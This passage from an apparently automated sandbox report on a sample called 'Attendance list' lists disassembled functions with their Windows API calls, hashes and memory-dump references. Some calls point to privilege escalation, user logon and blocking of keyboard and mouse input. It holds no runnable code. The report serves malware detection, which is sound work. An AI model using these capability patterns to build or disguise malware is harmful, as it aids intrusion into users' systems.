                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: f68f8bfab945120dc6d60ceefc6f2bc5ce9ab94a9e681b405fc3d9803fb8f92a
                        • Instruction ID: cc9a824899c0aa3ffcd48bc1f043de4dcc0aad25d8b77960c8fb482e6775aec8
                        • Opcode Fuzzy Hash: f68f8bfab945120dc6d60ceefc6f2bc5ce9ab94a9e681b405fc3d9803fb8f92a
                        • Instruction Fuzzy Hash: 79215C35A10518EFCB00EFA5E884EAEBBB8FF49310F1480A9E945EB351DB31A955CB51
                        Function 00918CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                        • GetLastError.KERNEL32 ref: 00918D47
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                        • String ID:
                        • API String ID: 1922334811-0
                        • Opcode ID: ba438cbae0425c2da2dd0cfb7701f1c9c911bec7a693af7fa153c525bc2ac9b7
                        • Instruction ID: 3489924412cfaaba2cba69ce221b33f4d05965c0209d47ea5ef5991bd50f3b17
                        • Opcode Fuzzy Hash: ba438cbae0425c2da2dd0cfb7701f1c9c911bec7a693af7fa153c525bc2ac9b7
                        • Instruction Fuzzy Hash: A81182B5514309AFD728DF58EC85D6BB7BDFB45710B10852EF45693281DF70AC409B60
                        Function 00924C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00924C2C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00924C43
                        • FreeSid.ADVAPI32(?), ref: 00924C53
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: cbb1dbbdbc8e3b76b88f720910b438f678fe6b1955ae30f2f587b838f15bfd0f
                        • Instruction ID: e0509a5cf3273df202ff62a97733fe398a164bd21899f1c3cba1f2de3b5263e7
                        • Opcode Fuzzy Hash: cbb1dbbdbc8e3b76b88f720910b438f678fe6b1955ae30f2f587b838f15bfd0f
                        • Instruction Fuzzy Hash: C4F04979A1130DBFDF04DFF4DC99EAEBBBCEF08301F0044A9A901E2181E6706A049B50
                        Function 008CE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6381e03abf9fb28932b8eb7890650eda982d5aa553b261532efaf5797344ecbe
                        • Instruction ID: 3ad272928e934b15dc2cd195dd4405029137f92a2a76f168277983d2d2288a44
                        • Opcode Fuzzy Hash: 6381e03abf9fb28932b8eb7890650eda982d5aa553b261532efaf5797344ecbe
                        • Instruction Fuzzy Hash: B2227970A0025ACFDB24DF68C484BAAB7B4FF05304F18846DE856EB381E775E985CB91
                        Function 0092C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 0092C966
                        • FindClose.KERNEL32(00000000), ref: 0092C996
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 18cd080f31f74112ebe45d9217dc7f12eb6111c0a1230995bf09a460437895b0
                        • Instruction ID: 9ea60860a9300dbebe9b769a0e7d35f08b23660a2056e6bd0f6769f128f285a4
                        • Opcode Fuzzy Hash: 18cd080f31f74112ebe45d9217dc7f12eb6111c0a1230995bf09a460437895b0
                        • Instruction Fuzzy Hash: CA118E766106109FD710EF29D849E2AF7E9FF85324F00895EF8A9D7291DB70AC00CB81
                        Function 0092A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0093977D,?,0094FB84,?), ref: 0092A302
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0093977D,?,0094FB84,?), ref: 0092A314
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: c022f11e5a9d7d2331a0d3947f18120f374dea3a183fbfd8540e3e60ff5bf9d9
                        • Instruction ID: fb2a73ede7e5b0885a3a1b976dd82e62d899a0c31323888a0d1c27370d46bc4c
                        • Opcode Fuzzy Hash: c022f11e5a9d7d2331a0d3947f18120f374dea3a183fbfd8540e3e60ff5bf9d9
                        • Instruction Fuzzy Hash: 77F0E23511922DEBDB209FA4CC48FEA736CFF09361F004269B908D2181DA309900CBA1
                        Function 00918713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00918851), ref: 00918728
                        • CloseHandle.KERNEL32(?,?,00918851), ref: 0091873A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 984e851a8022956b570c7a0b47f3cee6d5ba31b9bbcb1340061bf15a4a3972a9
                        • Instruction ID: 7367cb6af02893ce5c92bd33971e8f8b51e92e410069613891b4295a26f9dc6b
                        • Opcode Fuzzy Hash: 984e851a8022956b570c7a0b47f3cee6d5ba31b9bbcb1340061bf15a4a3972a9
                        • Instruction Fuzzy Hash: 72E0B676014A51EEEB652B65EC09D77BBE9FB057507248829F8A6C0870DB72AC90EB10
                        Function 008EA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008E8F97,?,?,?,00000001), ref: 008EA39A
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008EA3A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: abf52d9028111d7b8cccdd5e397889f7a9d3fefe5d2c45adbc77bb7d8d89672f
                        • Instruction ID: 7d2af928cad619a3736012360fb4e1b8e2eadbc7b9779ba09eea58abc818d81d
                        • Opcode Fuzzy Hash: abf52d9028111d7b8cccdd5e397889f7a9d3fefe5d2c45adbc77bb7d8d89672f
                        • Instruction Fuzzy Hash: 36B0923506820AABCA002F91EC19F883F68EB46BE2F404020F60D84060EB625450AA91
                        Function 008EF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46d7c388e050639e5fbd088edbd6f2bac4bee328e7143e040d40f48713a8da87
                        • Instruction ID: ab747a1411550b559c548192b163e8bccf3809c7ab02cd95bc7f1489ea1305fc
                        • Opcode Fuzzy Hash: 46d7c388e050639e5fbd088edbd6f2bac4bee328e7143e040d40f48713a8da87
                        • Instruction Fuzzy Hash: A5322421D2DF414DD7239636D832335A248EFB73D5F25D737E81AB59A6EB28C5835200
                        Function 008F267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1c01a586fe6e29dac05d1c1df5325382ff0adea63ef66f9e60d10e471fb05ec
                        • Instruction ID: ac668fbc66c61d9879b12dc6ee37ccd123dca7894ebfabd573df5fd45cda3342
                        • Opcode Fuzzy Hash: b1c01a586fe6e29dac05d1c1df5325382ff0adea63ef66f9e60d10e471fb05ec
                        • Instruction Fuzzy Hash: 66B1F220D3AF514DD7239A3A8831336BA5CAFBB2DAF51D71BFC1674D22EB2185835241
                        Function 00928B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • __time64.LIBCMT ref: 00928B25
                          • Part of subcall function 008E543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009291F8,00000000,?,?,?,?,009293A9,00000000,?), ref: 008E5443
                          • Part of subcall function 008E543A: __aulldiv.LIBCMT ref: 008E5463
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Time$FileSystem__aulldiv__time64
                        • String ID:
                        • API String ID: 2893107130-0
                        • Opcode ID: 87feeb0309c0a08f8603b000c81d654b3c2e0d869689e84887a41f1e037571eb
                        • Instruction ID: 0f2965a091a5932ea4a5fb37679ef5b6e1a11aa74e9bfaf9a793805c28a23e78
                        • Opcode Fuzzy Hash: 87feeb0309c0a08f8603b000c81d654b3c2e0d869689e84887a41f1e037571eb
                        • Instruction Fuzzy Hash: 3721E4726396108BC729CF69D441A52F3E1EFA5311B288E6CE0F5CB2D0CA34B905DB94
                        Function 009341FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 00934218
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 8095fa8d4e1d3e68141999f7e4704560ac4b20a7ea81f2df1c5838ea63f832d3
                        • Instruction ID: dd08dc62ffaa076eacd69c910d7c840577d61fb8f29297380905189846da1450
                        • Opcode Fuzzy Hash: 8095fa8d4e1d3e68141999f7e4704560ac4b20a7ea81f2df1c5838ea63f832d3
                        • Instruction Fuzzy Hash: D9E01A352502149FCB10AF5AD844E9AB7E8EF94760F02846AFC49D7262DA74E8408BA1
                        Function 00924EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00924EEC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: mouse_event
                        • String ID:
                        • API String ID: 2434400541-0
                        • Opcode ID: 867bea11b493b12d7a0fa9307b5ac940c2f78a6466c33aabf2aaaccc6e03555d
                        • Instruction ID: 12920307d5d9bcb2e866977bc533c6e1effc171ef50a6f95e10dda04005990b2
                        • Opcode Fuzzy Hash: 867bea11b493b12d7a0fa9307b5ac940c2f78a6466c33aabf2aaaccc6e03555d
                        • Instruction Fuzzy Hash: 8CD0A7A827072579FD185F20BC5FF77010CF304791FD2459AB102C90C9E8D46C506430
                        Function 00918C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009188D1), ref: 00918CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: acfecae9b7432c4f3b8d719f499e2685f7f04cd178c20d4c4a37472e158430eb
                        • Instruction ID: f62f4138f040be1b6d49515fe261ad62f8747538fd604965d4fd294cdfc54207
                        • Opcode Fuzzy Hash: acfecae9b7432c4f3b8d719f499e2685f7f04cd178c20d4c4a37472e158430eb
                        • Instruction Fuzzy Hash: CBD05E3226450EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                        Function 00902230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00902242
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: 0cce87b5ceb1620594aeec56920dbe7ccb7bc85e3ba5f95af367d1bc252b77ef
                        • Instruction ID: ae0c68db6808b8b729a60e2eb980a285f519dddf5fc42bf6db94d60a30151c97
                        • Opcode Fuzzy Hash: 0cce87b5ceb1620594aeec56920dbe7ccb7bc85e3ba5f95af367d1bc252b77ef
                        • Instruction Fuzzy Hash: 09C048F581410ADBDB15DBA0DA98DEEB7BCAB08304F2044A6A102F2140E7789B449A71
                        Function 008EA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008EA36A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 8ca264d0a2114c0be4088b1835b5c2eab0c5f3088a3db25316b0bd801d4c1992
                        • Instruction ID: 585bebca15423cf8e87296ccecb7687b8b9a00e48532996dd272c80f0bd7b976
                        • Opcode Fuzzy Hash: 8ca264d0a2114c0be4088b1835b5c2eab0c5f3088a3db25316b0bd801d4c1992
                        • Instruction Fuzzy Hash: 8EA0123001410DA78A001F41EC04C447F5CD6016D07004020F40C40021973254105580
                        Function 008D8A0E Relevance: .6, Instructions: 608COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1874ad6cecf77dddf8d32c3370a20653d7dfba3ce0ac1a5da71cb3b8d1bd9b43
                        • Instruction ID: f8ddc0ab284a1d30c9e91370af30905a6f6b8c21af89e4d285e9eda068dc5970
                        • Opcode Fuzzy Hash: 1874ad6cecf77dddf8d32c3370a20653d7dfba3ce0ac1a5da71cb3b8d1bd9b43
                        • Instruction Fuzzy Hash: 2F22453061561ACBCF389B29C4C46BDB7A1FB81354F2A866BD852CB391DB349DC1CB61
                        Function 008E2405 Relevance: .3, Instructions: 345COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction ID: 5c6eb0b1f3543362abc9a0be331334323b21d7a147a2260598087d53474fb3c2
                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction Fuzzy Hash: D9C171322051E309DF6D863B943413EBAE5BAA37B131A0B6DE4B3CB5D4EF20D564D620
                        Function 008E283A Relevance: .3, Instructions: 341COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction ID: a785705986c857eff090bbe1d398c55f77387630c33d932931396f4fdde7ae2a
                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction Fuzzy Hash: 87C170322091E309DF2D463B943403EBBE5AAA37B131A176DE4B2DB5D5EF20D564A620
                        Function 008E1BB8 Relevance: .3, Instructions: 323COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
